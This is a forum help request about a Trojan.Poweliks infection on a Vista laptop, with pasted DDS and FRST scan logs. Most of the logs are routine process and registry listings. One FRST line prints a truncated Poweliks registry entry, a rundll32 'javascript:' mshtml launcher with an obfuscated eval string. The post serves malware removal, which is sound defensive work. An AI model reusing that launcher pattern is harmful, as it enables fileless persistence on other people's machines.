Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Trojan.Poweliks with multiple dllhost.exe processes consuming memory!


  • This topic is locked This topic is locked
6 replies to this topic

#1 sp000ky

sp000ky

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:12:53 PM

Posted 18 October 2014 - 05:22 PM

Like many other members, I appear to have this infection. In Task Manager, there are about 20 dllhost.exe *32 processes, and under the command line column for about ten of them it says ###CLIENT###. My computer has taken an hour to just post this. I have attached scans from DDS and FRST. I will be thrilled if someone helps. Thank you so much :) :)

 

OS: Vista

Dllhost Processes are coming from C:\Windows\syswow64 folder

 

 

DDS.txt

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 8.0.6001.19088  BrowserJavaVersion: 10.67.2
Run by Ashley at 13:23:13 on 2014-10-18
Microsoft® Windows Vista™ Home Premium   6.0.6001.1.1252.1.1033.18.4085.846 [GMT -7:00]
.
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_15f4e438\STacSV64.exe
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Program Files\Dell\DellDock\DockLogin.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\WLTRYSVC.EXE
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\bcmwltry.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_15f4e438\AESTSr64.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\ProgramData\SingleClick Systems\MySQL\bin\mysqld.exe
C:\ProgramData\SingleClick Systems\Remote Access File Sync Service\dsl_fs_sync.exe
c:\ProgramData\SingleClick Systems\Advanced Networking Service\hnm_svc.exe
C:\Windows\system32\lxducoms.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
C:\Windows\System32\tcpsvcs.exe
C:\Windows\System32\snmp.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\DellTPad\Apoint.exe
C:\Windows\System32\WLTRAY.EXE
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\IDT\WDM\sttray64.exe
C:\Windows\ehome\ehtray.exe
C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe
C:\Program Files (x86)\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe
C:\Program Files (x86)\Dell\MediaDirect\PCMService.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\DellTPad\ApMsgFwd.exe
svchost.exe
C:\Program Files\DellTPad\HidFind.exe
C:\Program Files\DellTPad\Apntex.exe
C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe
C:\Windows\system32\svchost.exe -k HPService
svchost.exe
C:\Users\Ashley\AppData\Local\Apps\2.0\KH6XP463.OY2\CW4LTZ3J.OK8\dell..tion_0f612f649c4a10af_0005.0004_3ddfe37344028d2c\DellSystemDetect.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\msiexec.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\SysWow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\system32\taskmgr.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\regsvr32.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = about:blank
uWindow Title = Internet Explorer provided by Dell
uSearch Bar = hxxp://www.google.com/ie
uSearch Page = hxxp://www.google.com
uDefault_Page_URL = hxxp://www.dell.com
uDefault_Search_URL = hxxp://www.google.com/ie
mDefault_Page_URL = hxxp://www.dell.com
uProxyServer = 127.0.0.1:5222
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
mWinlogon: Userinit = C:\Windows\SysWOW64\userinit.exe,
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Lexmark Printable Web: {D2C5E510-BE6D-42CC-9F61-E4F939078474} - C:\Program Files\Lexmark Printable Web\bho.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
uRun: [ehTray.exe] C:\Windows\ehome\ehTray.exe
uRun: [Akamai NetSession Interface] "C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe"
uRun: [DellSystemDetect] C:\Users\Ashley\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell\Dell System Detect.appref-ms
uRun: [FreeRAM XP] "C:\Program Files (x86)\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe" -win
uRun: [uTorrent] "C:\Users\Ashley\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED
mRun: [PCMService] "C:\Program Files (x86)\Dell\MediaDirect\PCMService.exe"
mRun: [GrooveMonitor] "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe"
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
uPolicies-Explorer: NoDriveTypeAutoRun = dword:221
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoDriveTypeAutoRun = dword:255
mPolicies-System: EnableLUA = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-Explorer: NoDriveTypeAutoRun = dword:145
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MI1933~1\Office12\EXCEL.EXE/3000
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
Trusted Zone: dell.com
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{455A3EB7-4B70-4DBC-BB5F-BFA7A628BC11} : DHCPNameServer = 192.168.42.129
TCP: Interfaces\{70A72AA5-ACC7-4118-B091-943A95985152} : DHCPNameServer = 192.168.1.1
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll
Notify: SDWinLogon - SDWinLogon.dll
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
LSA: Security Packages =  kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.101\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-mDefault_Page_URL = hxxp://www.dell.com
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-Run: [Apoint] C:\Program Files\DellTPad\Apoint.exe
x64-Run: [Broadcom Wireless Manager UI] C:\Windows\System32\WLTRAY.exe
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [SysTrayApp] C:\Program Files (x86)\IDT\WDM\sttray64.exe
x64-mPolicies-Explorer: NoActiveDesktop = dword:1
x64-mPolicies-Explorer: NoDriveTypeAutoRun = dword:255
x64-mPolicies-System: EnableLUA = dword:0
x64-mPolicies-System: EnableUIADesktopToggle = dword:0
x64-Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\
FF - prefs.js: browser.startup.homepage - about:home
FF - prefs.js: network.proxy.type - 0
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Virtools\3D Life Player\npvirtools.dll
FF - plugin: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll
.
============= SERVICES / DRIVERS ===============
.
R0 gfibto;gfibto;C:\Windows\System32\drivers\gfibto.sys [2013-7-18 14456]
R0 PxHlpa64;PxHlpa64;C:\Windows\System32\drivers\PxHlpa64.sys [2008-12-16 55024]
R0 SmartDefragDriver;SmartDefragDriver;C:\Windows\System32\drivers\SmartDefragDriver.sys [2014-2-13 21184]
R1 SASDIFSV;SASDIFSV;C:\Program Files\SUPERAntiSpyware\sasdifsv64.sys [2011-7-22 14928]
R1 SASKUTIL;SASKUTIL;C:\Program Files\SUPERAntiSpyware\saskutil64.sys [2011-7-12 12368]
R1 VBoxDrv;VirtualBox Service;C:\Windows\System32\drivers\VBoxDrv.sys [2011-1-19 226448]
R1 VBoxUSBMon;VirtualBox USB Monitor Driver;C:\Windows\System32\drivers\VBoxUSBMon.sys [2011-1-19 54864]
R2 npf;NetGroup Packet Filter Driver;C:\Windows\System32\drivers\npf.sys [2011-2-11 35344]
R3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;C:\Windows\System32\drivers\k57nd60a.sys [2012-9-25 440360]
R3 OA001Ufd;Creative Camera OA001 Upper Filter Driver;C:\Windows\System32\drivers\OA001Ufd.sys [2009-3-6 159840]
R3 OA001Vid;Creative Camera OA001 Function Driver;C:\Windows\System32\drivers\OA001Vid.sys [2009-3-8 319840]
R3 RLDesignVirtualAudioCableWdm;Live! Cam Virtual;C:\Windows\System32\drivers\livecamv.sys [2009-5-7 49664]
R3 VBoxNetAdp;VirtualBox Host-Only Ethernet Adapter;C:\Windows\System32\drivers\VBoxNetAdp.sys [2011-1-18 154256]
R3 VBoxNetFlt;VBoxNetFlt Service;C:\Windows\System32\drivers\VBoxNetFlt.sys [2011-1-18 173840]
S3 cpudrv64;cpudrv64;C:\Program Files (x86)\SystemRequirementsLab\cpudrv64.sys [2009-12-18 17864]
S3 HTCAND64;HTC Device Driver;C:\Windows\System32\drivers\ANDROIDUSB.sys [2009-6-10 31744]
S3 IntcHdmiAddService;Intel® High Definition Audio HDMI;C:\Windows\System32\drivers\IntcHdmi.sys [2008-9-22 126464]
S3 ManyCam;ManyCam Virtual Webcam, WDM Video Capture Driver;C:\Windows\System32\drivers\ManyCam_x64.sys [2008-3-13 27136]
S3 PSSDK42;PSSDK42;C:\Windows\System32\drivers\pssdk42.sys [2011-3-24 53312]
S3 rspLLL;rspLLL;C:\Windows\System32\drivers\rspLLL64.sys [2013-10-16 23968]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2014-7-28 54784]
S3 WDC_SAM;WD SCSI Pass Thru driver;C:\Windows\System32\drivers\wdcsam64.sys [2008-5-6 14464]
S3 WSDScan;WSD Scan Support via UMB;C:\Windows\System32\drivers\WSDScan.sys [2008-1-20 24064]
.
=============== File Associations ===============
.
FileExt: .js: JSFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
FileExt: .jse: JSEFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
.
=============== Created Last 30 ================
.
.
==================== Find3M  ====================
.
2014-10-17 21:08:52 34808 ----a-w- C:\Windows\System32\drivers\TrueSight.sys
2014-10-17 17:08:04 122584 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-10-17 16:10:53 103265616 ----a-w- C:\Windows\System32\mrt.exe
2014-10-10 16:51:06 122584 ----a-w- C:\Windows\System32\drivers\48230029.sys
2014-10-09 22:41:55 0 ----a-w- C:\Windows\System32\rfbju.dll
2014-10-09 22:41:30 81408 ----a-w- C:\Windows\System32\mpcete.dll
2014-09-23 22:56:14 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-09-23 22:56:14 701104 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-09-15 16:06:02 278152 ------w- C:\Windows\System32\MpSigStub.exe
2014-08-31 07:01:11 98216 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2014-08-31 07:01:09 272808 ----a-w- C:\Windows\SysWow64\javaws.exe
2014-08-31 07:01:09 175528 ----a-w- C:\Windows\SysWow64\javaw.exe
2014-08-31 07:01:09 175528 ----a-w- C:\Windows\SysWow64\java.exe
2014-07-28 21:52:00 6112072 ----a-w- C:\Windows\System32\usbaaplrc.dll
2014-07-28 21:52:00 54784 ----a-w- C:\Windows\System32\drivers\usbaapl64.sys
.
============= FINISH: 13:30:18.22 ===============
 
 
 
FRST.txt
 
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by Ashley (administrator) on LAPTOP on 18-10-2014 14:22:29
Running from C:\Users\Ashley\Desktop
Loaded Profiles: Ashley & RA Media Server (Available profiles: Ashley & RA Media Server & Mcx1 & Games & Study & Administrator & Guest)
Platform: Windows Vista ™ Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_15f4e438\stacsv64.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
() C:\Windows\System32\WLTRYSVC.EXE
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Dell Inc.) C:\Windows\System32\BCMWLTRY.EXE
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_15f4e438\AESTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\ProgramData\SingleClick Systems\MySQL\bin\mysqld.exe
(SingleClick Systems) C:\ProgramData\SingleClick Systems\Remote Access File Sync Service\dsl_fs_sync.exe
(Dell Inc.) C:\ProgramData\SingleClick Systems\Advanced Networking Service\hnm_svc.exe
( ) C:\Windows\System32\lxducoms.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corporation) C:\Windows\System32\TCPSVCS.EXE
(Microsoft Corporation) C:\Windows\System32\snmp.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(Dell Inc.) C:\Windows\System32\WLTRAY.EXE
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Akamai Technologies, Inc.) C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe
(YourWare Solutions ™) C:\Program Files (x86)\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe
(CyberLink Corp.) C:\Program Files (x86)\Dell\MediaDirect\PCMService.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Akamai Technologies, Inc.) C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Dell) C:\Users\Ashley\AppData\Local\Apps\2.0\KH6XP463.OY2\CW4LTZ3J.OK8\dell..tion_0f612f649c4a10af_0005.0004_3ddfe37344028d2c\DellSystemDetect.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
(Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [271872 2008-07-16] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Broadcom Wireless Manager UI] => C:\Windows\system32\WLTRAY.exe [4119552 2008-11-17] (Dell Inc.)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [462848 2009-03-16] (IDT, Inc.)
HKLM-x32\...\Run: [PCMService] => C:\Program Files (x86)\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [DellSystemDetect] => C:\Users\Ashley\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell\Dell System Detect.appref-ms
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [FreeRAM XP] => C:\Program Files (x86)\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe [1591808 2006-03-23] (YourWare Solutions ™)
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [uTorrent] => "C:\Users\Ashley\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Policies\Explorer: [NoLogOff] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\MountPoints2: {7c5292e9-9623-11df-861e-005056c00008} - J:\Autorun.exe
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [EA Core] => C:\Program Files (x86)\Electronic Arts\EADM\Core.exe -silent
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [Google Update] => "C:\Users\Ashley\AppData\Local\Google\Update\GoogleUpdate.exe" /c
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [Akamai NetSession Interface] => C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Policies\Explorer: [NoLogOff] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\MountPoints2: {4e39f91a-cbb5-11dd-8863-806e6f6e6963} - E:\autorun.exe
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Mcx1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
